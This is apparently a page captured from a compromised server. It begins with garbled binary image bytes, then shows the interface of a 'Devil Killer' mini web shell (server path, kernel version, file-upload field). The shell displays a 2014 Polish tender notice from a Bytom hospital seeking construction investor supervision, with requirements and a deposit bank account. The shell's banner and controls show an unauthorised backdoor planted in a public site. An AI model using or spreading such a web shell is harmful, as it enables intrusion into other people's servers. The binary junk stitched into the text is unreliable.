JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140331/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140331/69079-N-2014.html

<p class="kh_header"><b>Bytom: Przetarg nieograniczony na:  Sprawowanie obowiązków nadzoru inwestorskiego, nad realizacją zadania inwestycyjnego pn.: Przebudowa, nadbudowa,  rozbudowa i remont budynku bloku VA Szpitala Specjalistycznego nr 2 w Bytomiu</b><br>
<b>Numer ogłoszenia: 69079 - 2014; data zamieszczenia: 31.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Specjalistyczny Nr 2 , ul. Stefana Batorego 15, 41-902 Bytom, woj. śląskie, tel. 32 7861400, faks 32 7861646.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.szpital2.bytom.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na:  Sprawowanie obowiązków nadzoru inwestorskiego, nad realizacją zadania inwestycyjnego pn.: Przebudowa, nadbudowa,  rozbudowa i remont budynku bloku VA Szpitala Specjalistycznego nr 2 w Bytomiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pełnienie nadzoru inwestorskiego w pełnym zakresie. 
Do podstawowych obowiązków inspektora nadzoru inwestorskiego należy:
reprezentowanie inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji z projektem i pozwoleniem na budowę przepisami i obowiązującymi Polskimi Normami oraz zasadami wiedzy technicznej;
sprawdzanie jakości wykonanych robót, wbudowanych materiałów budowlanych, zapobieganie zastosowaniu materiałów wadliwych i nie dopuszczonych do obrotu i stosowania w budownictwie;
sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających, uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych oraz przygotowanie i udział w czynnościach odbioru obiektów budowlanych i przekazywaniu ich do użytkownika;
potwierdzanie faktycznie wykonanych robót oraz usunięcia wad, a także kontrolowanie rozliczeń budowy,

3. Zakres praw i obowiązków inspektora nadzoru jw. wynika z art. 25 i 26 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (jednolity tekst: Dz. U. z 2010 r. Nr 243, poz. 1623, z pózn. zmianami) i obejmuje w szczególności:
3.1.	wszelkie czynności określone ustawą jw. i przepisami wykonawczymi do niej w odniesieniu do wszystkich branż. 
3.2.	wydawanie kierownikowi budowy lub kierownikowi robót poleceń potwierdzonych wpisem do dziennika budowy dotyczących:
a) usunięcia nieprawidłowości lub zagrożeń,
b) wykonania prób lub badań, także wymagających odkrycia robót lub elementów zakrytych oraz przedstawienia ekspertyz dotyczących prowadzonych robót budowlanych, dowodów dopuszczenia do obrotu i stosowania w budownictwie wyrobów budowlanych oaz urządzeń technicznych
3.3.	dokładne zapoznanie się z:
	dokumentacją techniczną
 dokumentacją przetargową udostępnianą wykonawcom na etapie przetargu,
ofertą przetargową wykonawcy, 
warunkami umowy zawartej pomiędzy Zamawiającym i Wykonawcą,
3.4.	nadzór nad terminowością realizacji prac, w szczególności w zakresie dotrzymania terminu zakończenia prac i uzyskania przez Wykonawcę robót wszystkich dokumentów koniecznych dla odbioru przedmiotu umowy i przekazania do użytkowania,
3.5.	kompletowanie i kontrola wszelkich dokumentów wymaganych od wykonawców zgodnie z zawartymi umowami, a koniecznych do odbioru końcowego, oraz przekazania do użytkowania przedmiotu umowy,
3.6.	weryfikacja dokumentacji powykonawczej, wraz ze złożeniem pisemnego oświadczenia o kompletności dokumentacji powykonawczej,
3.7.	kontrola budowy co najmniej dwa razy w tygodniu, potwierdzona wpisem do Dziennika budowy,
3.8.	pełna dyspozycyjność - niezwłoczne stawianie się na uzasadnione wezwanie telefoniczne, lub inne Wykonawcy robót, potwierdzone wpisem do Dziennika budowy, lub telefoniczne i inne wezwanie Zamawiającego,
3.9.	udział w obowiązkowej kontroli przeprowadzanej przez Powiatowego Inspektora Nadzoru Budowlanego przed wydaniem decyzji pozwolenia na użytkowanie i ewentualna koordynacja działań mających na celu doprowadzenie do uzyskania pozytywnej decyzji pozwolenia na użytkowanie,
3.10.	udział na wezwanie Zamawiającego jako użytkownika obiektu w spotkaniach dotyczących nagłych awarii, lub ujawnienia wad w przedmiocie umowy, oraz udział w pracach komisji odbioru pogwarancyjnego,
3.11.	uczestnictwo w spotkaniach organizowanych przez Zamawiającego,
3.12.	pełna koordynacja działań w zakresie współpracy z projektantami w przypadku wystąpienia jakichkolwiek trudności w realizacji robót budowlanych wg zatwierdzonej dokumentacji technicznej,
3.13.	pisemne zgłaszanie zamawiającemu informacji dotyczących ewentualnych zakłóceń związanych z realizacją prac w tym również informacji o wszelkich opóźnieniach w realizacji harmonogramu, z określeniem ich przyczyn,
3.14.	rozliczenie finansowe wykonawców robót zgodnie z zawartymi umowami, między innymi weryfikacja protokołów rzeczowo - finansowych, stanowiących podstawę wystawiania faktur częściowych,
3.15.	wykonanie weryfikacji kosztorysów ofertowych w przypadku konieczności zlecenia robót dodatkowych, zamiennych lub uzupełniających,
3.16.	prowadzenie dokumentacji oraz bieżących i końcowych rozliczeń finansowych z realizacji inwestycji, w tym:
1)	Dokonywanie pełnej sprawozdawczości finansowej, zarówno dla zamawiającego, jak i wszelkich instytucji uczestniczących w finansowaniu zadania, (jeżeli takie wystąpią i jeżeli sprawozdawczości takiej będą wymagały). Sprawozdania finansowe mają być dokonywane przez Wykonawcę w okresach uzgodnionych z zamawiającym, bez wezwania.
2)	Prowadzenie pełnych rozliczeń inwestycji z instytucjami dofinansowującymi w zakresie prac objętych Projektem, w tym:
systematyczne monitorowanie przebiegu realizacji zadania oraz niezwłoczne informowanie o zaistniałych nieprawidłowościach,
pomiar wartości wskaźników osiągniętych dzięki realizacji zadania ze względu na specyfikę poszczególnych produktów i rezultatów projektu, wskaźniki monitorowane będą zgodnie z wytycznymi instytucji dofinansowujących projekt,
przygotowywanie i przekazywanie sprawozdań z realizacji zadania, Zamawiającemu jak również Instytucjom dofinansowującym projekt,
przekazywanie do instytucji finansujących wszystkich dokumentów i informacji związanych z realizacją projektu, których instytucje finansujące bądź zamawiający zażądają w okresie realizacji zadania.
 kontrola rozliczeń finansowych w tym :
- kontrola prawidłowości wystawienia faktur, zakresów prac i kwot w zakresie zgodności z zawartą umową z wykonawcą robót budowlanych, 
- sprawdzanie faktur częściowych przedkładanych przez wykonawcę kwalifikowanie ich do zapłaty i przekazanie ich zamawiającemu do zapłaty 
- sprawdzanie kalkulacji ewentualnych robót dodatkowych lub zamiennych 
- przygotowanie materiałów związanych z rozliczeniem ewentualnych kar umownych oraz odszkodowań obciążających wykonawcę za nienależyte lub nieterminowe wykonanie przez niego zobowiązań umownych 
- rozliczenie końcowe inwestycji (włącznie z rozliczeniem dotacji pozyskanych przez Zamawiającego ze źródeł zewnętrznych. 
3.17.	dojazd na budowę we własnym zakresie,
3.18.	inne czynności niezbędne do prawidłowego zrealizowania przedmiotu umowy, w tym udział w ocenie pod względem technicznym złożonych ofert, a w szczególności analiza i sprawdzenie kosztorysów ofertowych w przetargu na realizację zadania inwestycyjnego objętego nadzorem inwestorskim. 

4.	Specjalistyczny nadzór inwestorski budowlany winien obejmować następujące specjalizacje:
konstrukcyjno - budowlana 
sieci i instalacje sanitarne wod. - kan., gaz, c.o., wentylacja,
sieci i instalacje elektroenergetyczne
budowa dróg.

5. Nadzór inwestorski winien być zorganizowany w formie  samodzielnej jednostki organizacyjnej,  a skład osobowy  winien być kształtowany w zależności od potrzeb wynikających z realizacji inwestycji na podstawie harmonogramu rzeczowo - finansowego realizacji inwestycji..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-0, 71.53.00.00-0, 71.24.70.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zapewni jako część swojej oferty wadium w wysokości 10 000,00 zł. Wadium może być wniesione w pieniądzu przelewem na konto Zamawiającego w banku ING BANK ŚLĄSKI nr 05 1050 1230 1000 0023 1883 6794 z informacją na przelewie - wadium przetargowe na zadanie: Sprawowanie obowiązków nadzoru inwestorskiego nad realizacją przedsięwzięcia inwestycyjnego pn. :  Sprawowanie obowiązków nadzoru inwestorskiego, nad realizacją zadania inwestycyjnego pn.: Przebudowa, nadbudowa,  rozbudowa i remont budynku bloku VA Szpitala Specjalistycznego nr 2 w Bytomiu- znak sprawy 12/12PN/2014.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia żadnych wymogów w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy, których wiedza i doświadczenie pozwoli na prawidłowe wykonanie zamówienia, w szczególności o zamówienie mogą ubiegać się wykonawcy, którzy w okresie ostatnich trzech lat przed upływem terminu składania ofert pełnili nadzory inwestorskie wielobranżowe nad co najmniej trzema zadaniami inwestycyjnymi odpowiadającymi swoim rodzajem i wartością zadaniu, nad którym sprawowany ma być nadzór inwestorki w ramach niniejszego zamówienia tj. dotyczącymi obiektu kubaturowego użyteczności publicznej i wartości inwestycji nie niższej niż 8 000 000,00 zł każda. Co najmniej jedno z tych zadań winno dotyczyć obiektu służby zdrowia i zawierać w swym zakresie blok operacyjny, w którym występują co najmniej trzy sale operacyjne,
 co winno wynikać z dokumentów określonych w pkt. IV-2.4). 
.
    Jako referencje (inne dokumenty) dotyczące realizacji z ostatnich 3 lat przed dniem upływu terminu składania ofert, Zamawiający uzna takie, które:
w przypadku usług zrealizowanych dotyczą usług jw., których realizacja miała miejsce nie wcześniej jak 3 lata przed dniem upływu terminu składania ofert,
w przypadku usług realizowanych dotyczą usług jw., których realizacja trwała do dnia upływu terminu składania ofert, a zrealizowany do tego czasu zakres objętych nadzorem inwestorskim robót budowlanych wyniósł co najmniej 8 000 000 zł. 

W przypadku inwestycji, których wartość została wyrażona w umowie w innej walucie niż PLN należy dokonać przeliczenia tej waluty na PLN, przy zastosowaniu kursów walutowych po przeliczeniu średnim kursem NBP na dzień ukazania się ogłoszenia o zamówieniu w niniejszym postępowaniu (w przypadku inwestycji rozliczanych wyłącznie w walutach innych niż PLN). Jako referencje (inne dokumenty) dotyczące realizacji z ostatnich 3 lat przed upływem terminu składania ofert, Zamawiający uzna takie, które dotyczą realizacji usług, których zakończenie miało miejsce nie wcześniej jak 3 lata przed upływem terminu składania ofert.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy, którzy dysponują lub będą dysponować odpowiednio wykwalifikowanymi osobami posiadającymi uprawnienia do kierowania i nadzorowania robót budowlanych w odpowiednich specjalnościach dla zabezpieczenia nadzorów we wszystkich branżach wyszczególnionych w pkt. I. 4, tj.:
Inspektora nadzoru branży konstrukcyjno - budowlanej i co najmniej 5 letnie doświadczenie zawodowe w nadzorowaniu robót budowlanych w specjalności jw. na stanowisku inspektora nadzoru, gdzie był odpowiedzialny za sprawowanie nadzoru inwestorskiego, w szczególności robót budowlanych dotyczących budowy, lub przebudowy co najmniej trzech  obiektów kubaturowych użyteczności publicznej o wartości nie niższej niż 8 000 000,00 zł każdy, w tym co najmniej jeden obiekt jw. lecz w zakresie służby zdrowia, zawierający w swym zakresie blok operacyjny, w którym występują co najmniej dwie sale operacyjne, oraz posiadającego uprawnienia budowlane bez ograniczeń w specjalności konstrukcyjno - budowlanej, a także wpisanego na listę członków właściwej izby samorządu  zawodowego zgodnie z obowiązującymi przepisami prawa w danym kraju.
Przewidywane zaangażowanie przy realizacji niniejszego zamówienia w wymiarze pełnego etatu.
Inspektora nadzoru branży obejmującej sieci, instalacje sanitarne, wodno - kanalizacyjne, cieplne i wentylacyjno - klimatyzacyjne - posiadającego co najmniej 5-letnie doświadczenie zawodowe w pełnieniu samodzielnych funkcji technicznych w budownictwie na stanowisku odpowiedzialnym za wykonywanie robót z zakresu budowy sieci i instalacji sanitarnych, w zakresie instalacji wodnych, kanalizacyjnych, gazowych, cieplnych i wentylacyjno - klimatyzacyjnych w tym doświadczenie w pełnieniu samodzielnej funkcji technicznej w budownictwie (inspektora nadzoru), przy budowie, przebudowie, lub remoncie co najmniej trzech obiektów kubaturowych użyteczności publicznej o wartości nie niższej niż 8 000 000,00 zł każdy, w tym co najmniej jeden obiekt jw. lecz dotyczący służby zdrowia, w którym występowały instalacje gazów medycznych, oraz posiadającego uprawnienia bez ograniczeń do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych, wpisanego na listę członków właściwej izby samorządu zawodowego zgodnie z obowiązującymi przepisami prawa w danym kraju. Przewidywane zaangażowanie przy realizacji niniejszego zamówienia w wymiarze pełnego etatu.

Inspektora nadzoru branży obejmującej sieci, instalacje elektryczne posiadającego co najmniej 3 letnie doświadczenie zawodowe w pełnieniu samodzielnych funkcji technicznych w budownictwie na stanowisku odpowiedzialnym za sprawowanie funkcji inspektora nadzoru w zakresie robót elektrycznych i posiadającego uprawnienia bez ograniczeń do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjnej w zakresie sieci i instalacji elektrycznych, wpisanego na listę członków właściwej izby samorządu zawodowego zgodnie z obowiązującymi przepisami prawa w danym kraju.
Inspektora nadzoru branży drogowej posiadającego co najmniej 3-letnie doświadczenie zawodowe w pełnieniu samodzielnych funkcji technicznych w budownictwie na stanowisku odpowiedzialnym za pełnienie nadzoru inwestorskiego przy robotach drogowych oraz posiadającego uprawnienia do kierowania robotami drogowymi, a także wpisanego na listę członków właściwej izby samorządu zawodowego, zgodnie z obowiązującymi przepisami prawa w danym kraju. 
co winno wynikać z dokumentów określonych w pkt. IV-2.2).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy, którzy dysponują lub będą dysponować odpowiednio wykwalifikowanymi osobami posiadającymi uprawnienia do kierowania i nadzorowania robót budowlanych w odpowiednich specjalnościach dla zabezpieczenia nadzorów we wszystkich branżach wyszczególnionych w pkt. I. 4, tj.:
Inspektora nadzoru branży konstrukcyjno - budowlanej i co najmniej 5 letnie doświadczenie zawodowe w nadzorowaniu robót budowlanych w specjalności jw. na stanowisku inspektora nadzoru, gdzie był odpowiedzialny za sprawowanie nadzoru inwestorskiego, w szczególności robót budowlanych dotyczących budowy, lub przebudowy co najmniej trzech  obiektów kubaturowych użyteczności publicznej o wartości nie niższej niż 8 000 000,00 zł każdy, w tym co najmniej jeden obiekt jw. lecz w zakresie służby zdrowia, zawierający w swym zakresie blok operacyjny, w którym występują co najmniej dwie sale operacyjne, oraz posiadającego uprawnienia budowlane bez ograniczeń w specjalności konstrukcyjno - budowlanej, a także wpisanego na listę członków właściwej izby samorządu  zawodowego zgodnie z obowiązującymi przepisami prawa w danym kraju.
Przewidywane zaangażowanie przy realizacji niniejszego zamówienia w wymiarze pełnego etatu.
Inspektora nadzoru branży obejmującej sieci, instalacje sanitarne, wodno - kanalizacyjne, cieplne i wentylacyjno - klimatyzacyjne - posiadającego co najmniej 5-letnie doświadczenie zawodowe w pełnieniu samodzielnych funkcji technicznych w budownictwie na stanowisku odpowiedzialnym za wykonywanie robót z zakresu budowy sieci i instalacji sanitarnych, w zakresie instalacji wodnych, kanalizacyjnych, gazowych, cieplnych i wentylacyjno - klimatyzacyjnych w tym doświadczenie w pełnieniu samodzielnej funkcji technicznej w budownictwie (inspektora nadzoru), przy budowie, przebudowie, lub remoncie co najmniej trzech obiektów kubaturowych użyteczności publicznej o wartości nie niższej niż 8 000 000,00 zł każdy, w tym co najmniej jeden obiekt jw. lecz dotyczący służby zdrowia, w którym występowały instalacje gazów medycznych, oraz posiadającego uprawnienia bez ograniczeń do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych, wpisanego na listę członków właściwej izby samorządu zawodowego zgodnie z obowiązującymi przepisami prawa w danym kraju. Przewidywane zaangażowanie przy realizacji niniejszego zamówienia w wymiarze pełnego etatu.

Inspektora nadzoru branży obejmującej sieci, instalacje elektryczne posiadającego co najmniej 3 letnie doświadczenie zawodowe w pełnieniu samodzielnych funkcji technicznych w budownictwie na stanowisku odpowiedzialnym za sprawowanie funkcji inspektora nadzoru w zakresie robót elektrycznych i posiadającego uprawnienia bez ograniczeń do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjnej w zakresie sieci i instalacji elektrycznych, wpisanego na listę członków właściwej izby samorządu zawodowego zgodnie z obowiązującymi przepisami prawa w danym kraju.
Inspektora nadzoru branży drogowej posiadającego co najmniej 3-letnie doświadczenie zawodowe w pełnieniu samodzielnych funkcji technicznych w budownictwie na stanowisku odpowiedzialnym za pełnienie nadzoru inwestorskiego przy robotach drogowych oraz posiadającego uprawnienia do kierowania robotami drogowymi, a także wpisanego na listę członków właściwej izby samorządu zawodowego, zgodnie z obowiązującymi przepisami prawa w danym kraju. 
co winno wynikać z dokumentów określonych w pkt. IV-2.2).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy, których sytuacja ekonomiczna i finansowa pozwoli na wykonanie zamówienia, w szczególności o zamówienie mogą ubiegać się wykonawcy, którzy:
2.1.1. dysponują, lub będą dysponować środkami finansowymi wystarczającymi do realizacji przedmiotu zamówienia, określonymi na sumę 150 000,00 zł, co winno wynikać z dokumentów określonych w pkt. IV-2.5).
2.1.2 są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę co najmniej 400 000,00 zł, co powinno wynikać z dokumentu określonego w pkt. IV-2.6).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

